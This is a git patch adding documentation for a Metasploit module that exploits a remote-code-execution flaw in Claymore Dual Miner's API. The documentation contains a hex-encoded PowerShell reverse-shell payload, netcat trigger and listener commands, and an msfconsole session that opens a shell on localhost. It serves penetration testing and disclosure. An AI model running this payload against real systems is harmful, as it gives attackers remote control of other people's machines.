From 43d71cdc09352ef0b8fdfd6be016d6f588604577 Mon Sep 17 00:00:00 2001 From: ReverseBrain Date: Mon, 2 Jul 2018 16:02:36 +0200 Subject: [PATCH] Initial Claymore Dual Miner RCE doc commit --- .../claymore_dual_miner_remote_manager_rce.md | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md diff --git a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md new file mode 100644 index 0000000000..37ee541574 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md @@ -0,0 +1,48 @@ +## Description + +This module connects to the Claymore Dual Miner API server to exploit the RCE. +This module can target the remote system if the miner is running with read/write mode enabled. + +## Vulnerable Application + +[Claymore Dual Miner](https://github.com/nanopool/Claymore-Dual-Miner) allows an user to control the miner +configuration by uploading files inside its directory using the server API. Since there is no check on file names, an attacker +can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and execute it via Remote Manager GUI. + +## Verification Steps + +1. Start the vulnerable software: `EthDcrMiner64.exe -epool eth-eu1.nanopool.org:9999 -ewal 0x83718eb67761Cf59E116B92A8F5B6CFE28A186E2 -epsw x -mode 1 -ftime 10 -mport 3333` +2. Run on terminal: `{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat", "706f7765727368656c6c2e657865202d436f6d6d616e64202224636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e536f636b6574732e544350436c69656e7428273132372e302e302e31272c31323334293b2473747265616d203d2024636c69656e742e47657453747265616d28293b5b627974655b5d5d246279746573203d20302e2e36353533357c257b307d3b7768696c6528282469203d202473747265616d2e52656164282462797465732c20302c202462797465732e4c656e6774682929202d6e652030297b3b2464617461203d20284e65772d4f626a656374202d547970654e616d652053797374656d2e546578742e4153434949456e636f64696e67292e476574537472696e67282462797465732c302c202469293b2473656e646261636b203d202869657820246461746120323e2631207c204f75742d537472696e6720293b2473656e646261636b3220203d202473656e646261636b202b202750532027202b2028707764292e50617468202b20273e20273b2473656e6462797465203d20285b746578742e656e636f64696e675d3a3a4153434949292e4765744279746573282473656e646261636b32293b2473747265616d2e5772697465282473656e64627974652c302c2473656e64627974652e4c656e677468293b2473747265616d2e466c75736828297d3b24636c69656e742e436c6f7365282922"]}` +3. Run on terminal: `nc -lvp 1234` +4. Run on terminal: `echo -e '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}\n' | nc 127.0.0.1 3333 && echo` +5. You should get a shell + +## Options + + **RHOST** + + Remote Host + + **RPORT** + + Remote port the vulnerable software is running at, default is 3333. + + +### Remote target + + ``` + msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce + msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1 + rhost => 127.0.0.1 + msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1 + lhost => 127.0.0.1 + msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234 + lport => 1234 + msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit + + [*] Started reverse TCP handler on 127.0.0.1:1234 + [*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000 + + whoami + reversebrain + ```